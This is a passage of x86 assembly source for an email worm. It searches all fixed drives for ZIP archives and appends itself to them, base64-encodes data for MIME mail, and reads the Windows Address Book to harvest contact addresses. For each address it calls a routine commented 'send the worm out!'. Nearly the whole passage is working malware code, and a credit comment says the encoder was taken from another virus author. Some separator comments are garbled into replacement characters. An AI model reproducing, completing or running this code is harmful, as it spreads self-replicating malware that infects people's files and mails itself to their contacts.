|
lodsw
|
|||
|
.if AX != 2E2Eh && AX != 002Eh ; '..' or '.'
|
|||
|
; its not those silly directories...
|
|||
|
sub esi,02Eh
|
|||
|
mov eax,[esi]
|
|||
|
.if AL & 010h ; is it a directory
|
|||
|
; It is a directory
|
|||
|
lea esi,wfd.cFileName
|
|||
|
lea edi,wTemp
|
|||
|
|
|||
|
mov al,'*'
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
sub edi,2
|
|||
|
|
|||
|
push edi
|
|||
|
|
|||
|
xor ecx,ecx
|
|||
|
mov al,'\'
|
|||
|
|
|||
|
boohoo: stosb
|
|||
|
lodsb
|
|||
|
inc ecx
|
|||
|
cmp al,00h
|
|||
|
jnz boohoo
|
|||
|
|
|||
|
pop edi
|
|||
|
pushad
|
|||
|
invoke SearchZIP,addr wTemp
|
|||
|
popad
|
|||
|
|
|||
|
mov ax,'*\'
|
|||
|
stosw
|
|||
|
|
|||
|
sub ecx,2
|
|||
|
xor al,al
|
|||
|
rep stosb
|
|||
|
|
|||
|
.else
|
|||
|
; It is a file
|
|||
|
; Now we have to check if it is a .ZIP file
|
|||
|
lea edi,wfd.cFileName
|
|||
|
xor al,al
|
|||
|
xor ecx,ecx
|
|||
|
not ecx
|
|||
|
repnz scasb
|
|||
|
|
|||
|
sub edi,5
|
|||
|
mov eax,dword ptr [edi]
|
|||
|
or eax,020202020h
|
|||
|
cmp eax,'piz.' ; .zip file?
|
|||
|
jnz __ret002
|
|||
|
|
|||
|
lea edi,wTemp
|
|||
|
mov al,'*'
|
|||
|
xor ecx,ecx
|
|||
|
not ecx
|
|||
|
repnz scasb
|
|||
|
sub edi,2
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
stosw
|
|||
|
|
|||
|
invoke SetCurrentDirectory,addr wTemp
|
|||
|
lea esi,wfd.cFileName
|
|||
|
|
|||
|
pushad
|
|||
|
call zipappend
|
|||
|
popad
|
|||
|
|
|||
|
lea edi,wTemp
|
|||
|
xor al,al
|
|||
|
xor ecx,ecx
|
|||
|
not ecx
|
|||
|
repnz scasb
|
|||
|
sub edi,2
|
|||
|
|
|||
|
mov ax,'*\'
|
|||
|
stosw
|
|||
|
|
|||
|
.endif
|
|||
|
|
|||
|
.endif
|
|||
|
jmp zerowfd
|
|||
|
__ret002:
|
|||
|
invoke FindNextFile,hFind,addr wfd
|
|||
|
mov ebx,eax
|
|||
|
.endw
|
|||
|
|
|||
|
invoke FindClose,hFind
|
|||
|
NoFiles:
|
|||
|
ret
|
|||
|
;###########################
|
|||
|
zerodir:
|
|||
|
xor al,al
|
|||
|
lea edi,wTemp
|
|||
|
mov ecx,260
|
|||
|
rep stosb
|
|||
|
jmp __ret001
|
|||
|
zerowfd:
|
|||
|
xor al,al
|
|||
|
lea edi,wfd.cFileName
|
|||
|
mov ecx,256
|
|||
|
rep stosb
|
|||
|
jmp __ret002
|
|||
|
|
|||
|
SearchZIP ENDP
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; EncodeBase64: Encodes data into MIME format
|
|||
|
encodebase64: ; encodeBase64: Proper credit goez out to BumbleBee. I struggled with making
|
|||
|
; my own MIME encoder so I ripped one.. :) Thanks alot Bumblebee!!
|
|||
|
; input:
|
|||
|
; EAX = Address of data to encode
|
|||
|
; EDX = Address to put encoded data
|
|||
|
; ECX = Size of data to encode
|
|||
|
; output:
|
|||
|
; ECX = size of encoded data
|
|||
|
;
|
|||
|
xor esi,esi
|
|||
|
call over_enc_table
|
|||
|
db "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
|||
|
db "abcdefghijklmnopqrstuvwxyz"
|
|||
|
db "0123456789+/"
|
|||
|
over_enc_table:
|
|||
|
pop edi
|
|||
|
push ebp
|
|||
|
xor ebp,ebp
|
|||
|
baseLoop:
|
|||
|
movzx ebx,byte ptr [eax]
|
|||
|
shr bl,2
|
|||
|
and bl,00111111b
|
|||
|
mov bh,byte ptr [edi+ebx]
|
|||
|
mov byte ptr [edx+esi],bh
|
|||
|
inc esi
|
|||
|
|
|||
|
mov bx,word ptr [eax]
|
|||
|
xchg bl,bh
|
|||
|
shr bx,4
|
|||
|
mov bh,0
|
|||
|
and bl,00111111b
|
|||
|
mov bh,byte ptr [edi+ebx]
|
|||
|
mov byte ptr [edx+esi],bh
|
|||
|
inc esi
|
|||
|
|
|||
|
inc eax
|
|||
|
mov bx,word ptr [eax]
|
|||
|
xchg bl,bh
|
|||
|
shr bx,6
|
|||
|
xor bh,bh
|
|||
|
and bl,00111111b
|
|||
|
mov bh,byte ptr [edi+ebx]
|
|||
|
mov byte ptr [edx+esi],bh
|
|||
|
inc esi
|
|||
|
|
|||
|
inc eax
|
|||
|
xor ebx,ebx
|
|||
|
movzx ebx,byte ptr [eax]
|
|||
|
and bl,00111111b
|
|||
|
mov bh,byte ptr [edi+ebx]
|
|||
|
mov byte ptr [edx+esi],bh
|
|||
|
inc esi
|
|||
|
inc eax
|
|||
|
|
|||
|
inc ebp
|
|||
|
cmp ebp,24
|
|||
|
jna DontAddEndOfLine
|
|||
|
|
|||
|
xor ebp,ebp ; add a new line
|
|||
|
mov word ptr [edx+esi],0A0Dh
|
|||
|
inc esi
|
|||
|
inc esi
|
|||
|
test al,00h ; Optimized (overlap rlz!)
|
|||
|
org $-1
|
|||
|
DontAddEndOfLine:
|
|||
|
inc ebp
|
|||
|
sub ecx,3
|
|||
|
or ecx,ecx
|
|||
|
jne baseLoop
|
|||
|
|
|||
|
mov ecx,esi
|
|||
|
add edx,esi
|
|||
|
pop ebp
|
|||
|
ret
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; Locates addresses inside the default WAB file
|
|||
|
WABFindAddies PROC
|
|||
|
jmp @F
|
|||
|
mappedFile dd 0
|
|||
|
mapHandle dd 0
|
|||
|
fileHandle dd 0
|
|||
|
addrbuf db 256 dup (?)
|
|||
|
@@:
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
call @F
|
|||
|
phkWABKey dd 0
|
|||
|
@@:
|
|||
|
push KEY_ALL_ACCESS
|
|||
|
push eax
|
|||
|
call @F
|
|||
|
db "Software\Microsoft\WAB\WAB4\Wab File Name",0
|
|||
|
@@:
|
|||
|
push HKEY_CURRENT_USER
|
|||
|
call RegOpenKeyEx
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
call @F
|
|||
|
dd 0000007Fh
|
|||
|
@@:
|
|||
|
push offset wabfile
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax ; null for (default)
|
|||
|
push dword ptr [phkWABKey]
|
|||
|
call RegQueryValueEx
|
|||
|
push dword ptr [phkWABKey]
|
|||
|
call RegCloseKey
|
|||
|
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 3
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push 80000000h
|
|||
|
call @F
|
|||
|
wabfile db 128 dup (?)
|
|||
|
@@:
|
|||
|
call CreateFile
|
|||
|
|
|||
|
mov fileHandle,eax
|
|||
|
xchg eax,ebx
|
|||
|
|
|||
|
or ebx,ebx
|
|||
|
jz leavewab
|
|||
|
|
|||
|
push 0
|
|||
|
push ebx
|
|||
|
call GetFileSize
|
|||
|
mov esi,eax
|
|||
|
|
|||
|
push 0
|
|||
|
push esi
|
|||
|
push 0
|
|||
|
push PAGE_READONLY
|
|||
|
push 0
|
|||
|
push ebx
|
|||
|
call CreateFileMapping
|
|||
|
mov mapHandle,eax
|
|||
|
xchg eax,ebx
|
|||
|
|
|||
|
or ebx,ebx
|
|||
|
jz leavewab
|
|||
|
|
|||
|
push esi
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push FILE_MAP_READ
|
|||
|
push ebx
|
|||
|
call MapViewOfFile
|
|||
|
mov mappedFile,eax
|
|||
|
xchg eax,ebx
|
|||
|
|
|||
|
or ebx,ebx
|
|||
|
jz leavewab
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; Find the addresses
|
|||
|
; EBX=Base address
|
|||
|
mov esi,ebx
|
|||
|
mov ecx,[esi+64h] ; number of addies
|
|||
|
add esi,[esi+60h] ; points to first address
|
|||
|
looperz:
|
|||
|
push esi
|
|||
|
lea edi,Recipient
|
|||
|
push edi
|
|||
|
lop:
|
|||
|
lodsw
|
|||
|
stosb
|
|||
|
or al,al
|
|||
|
jnz lop
|
|||
|
pop ebx
|
|||
|
|
|||
|
sub edi,ebx
|
|||
|
mov sizeRecip,EDI
|
|||
|
|
|||
|
pop esi
|
|||
|
add esi,044h
|
|||
|
|
|||
|
PUSHAD
|
|||
|
CALL SendWorm ; send the worm out!
|
|||
|
POPAD
|
|||
|
|
|||
|
push ecx
|
|||
|
lea edi,Recipient
|
|||
|
xor al,al
|
|||
|
mov ecx,256
|
|||
|
rep stosb
|
|||
|
pop ecx
|
|||
|
|
|||
|
dec ecx
|
|||
|
jecxz leavewab
|
|||
|
jmp looperz
|
|||
|
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
leavewab:
|
|||
|
invoke UnmapViewOfFile,mappedFile
|
|||
|
invoke CloseHandle,mapHandle
|
|||
|
invoke CloseHandle,fileHandle
|
|||
|
|
|||
|
ret
|
|||
|
WABFindAddies ENDP
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; Thread procedures
|
|||
|
thread1 proc
|
|||
|
mov al,'c'
|
|||
|
lea edi,fr
|
|||
|
stosb
|
|||
|
mov ax,'\:'
|
|||
|
stosw
|
|||
|
sub edi,3
|
|||
|
isdriveok:
|
|||
|
push edi
|
|||
|
call GetDriveType
|
|||
|
cmp al,03h
|
|||
|
jnz nextdrive
|
|||
|
|
|||
|
mov byte ptr [edi+2],00h
|
|||
|
|
|||
|
jmp SearchZIP ; we dont even need a ret!
|
|||
|
|
|||
|
nextdrive:
|
|||
|
cmp al,"z"
|
|||
|
jz enddrive
|
|||
|
inc byte ptr [edi]
|
|||
|
jmp isdriveok
|
|||
|
enddrive:
|
|||
|
ret
|
|||
|
thread1 endp
|
|||
|
|
|||
|
thread2 proc
|
|||
|
pop eax ; dont need param
|
|||
|
mov [esp],eax
|
|||
|
call WABFindAddies
|
|||
|
xor eax,eax
|
|||
|
ret
|
|||
|
thread2 endp
|
|||
|
end start
|